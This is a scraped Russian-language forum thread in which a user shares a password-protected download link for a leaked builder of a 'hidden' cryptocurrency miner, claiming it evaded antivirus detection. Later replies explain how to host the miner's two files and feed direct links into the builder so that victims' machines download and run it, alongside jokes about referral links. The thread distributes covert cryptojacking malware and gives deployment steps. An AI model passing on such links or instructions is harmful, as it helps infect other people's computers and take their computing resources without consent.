Mr_VVoodman
Резидент
Для просмотра содержимого вам необходимо авторизоваться.
Последнее редактирование:
VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.
Видимо слили на VT, о тем не менее он хорошо, лучше бы прочекал, а потом писал про хрень.как бы самому не схватить скрытый майнер, который не палиться антивирусом, eset спалил хрень еще на скачивании
можно подробней не понял что на сервер грузить )Дамы и господа, сегодня я представляю вам билдер скрытого майнера слитого с одного форума из под огромного хайда (666 сообщений), на тот момент, когда я делал себе билд он не палился ни одним антивирусом! К сожалению, что на данный момент я не знаю, прочекаете сами. Впрочем хватит долгих разговоров, вот сам билдер: http://rgho.st/private/6DSg88DPz/6a4a0f4d9eec7790b270fe407e0a7f59
Пароль: 377UHLeQa59D
Инструкция внутри.
Удачи в майнинге.
Странно за такой слив лукас не поставить
можно подробней не понял что на сервер грузить )
Внутри основной папки есть папка XMiner, в ней находятся 2 файла, эти файлы надо загрузить на какой-нибудь файлообменник или свой сайт размещённый к примеру на каком-нибудь бесплатном хостинге. В билдер надо вставить прямые ссылки на файлы, что бы при переходе сразу начиналось скачивание. Надеюсь объяснил.можно подробней не понял что на сервер грузить )
потом запускаешь билд и все работает ?Внутри основной папки есть папка XMiner, в ней находятся 2 файла, эти файлы надо загрузить на какой-нибудь файлообменник или свой сайт размещённый к примеру на каком-нибудь бесплатном хостинге. В билдер надо вставить прямые ссылки на файлы, что бы при переходе сразу начиналось скачивание. Надеюсь объяснил.
Да, майнит на 50%.потом запускаешь билд и все работает ?
ну что проверел ? работает ?как бы самому не схватить скрытый майнер, который не палиться антивирусом, eset спалил хрень еще на скачивании
Cам майнер работает?рефералка в ссылке:))
Откуда же вы берётесь такие умные?))))рефералка в ссылке:))
Парень, не знаешь, не говори.Откуда же вы берётесь такие умные?))))
Ни кто, слышите, ни кто не нажимайте на ссылку, ТС разбогатеет на нас и выкачает все очень важные фото с компа "Отдых в Адлере 2012 года" :sob::laughing::joy:
Насмешил реферальщик))
Что именно я не знаю? То, что это http://hiderefer.me и это /6a4a0f4d9eec7790b270fe407e0a7f59Парень, не знаешь, не говори.
Возьми любую ссылку на форуме, и будет то же самое.Что именно я не знаю? То, что это http://hiderefer.me и это /6a4a0f4d9eec7790b270fe407e0a7f59
Рефералка?)))Конечно знаю и думаю, что все на мне зарабатывают миллионы,а разве не так? :no_mouth:
Ух ты... А я то думал :sob:Возьми любую ссылку на форуме, и будет то же самое.
можешь подробно описать что и как делать. Первый раз сталкиваюсь с майнером... можно в лсПарень, не знаешь, не говори.
Могу спросить у человека, если смогу достучаться.Эх, были бы исходники...
Буду очень благодарен)Могу спросить у человека, если смогу достучаться.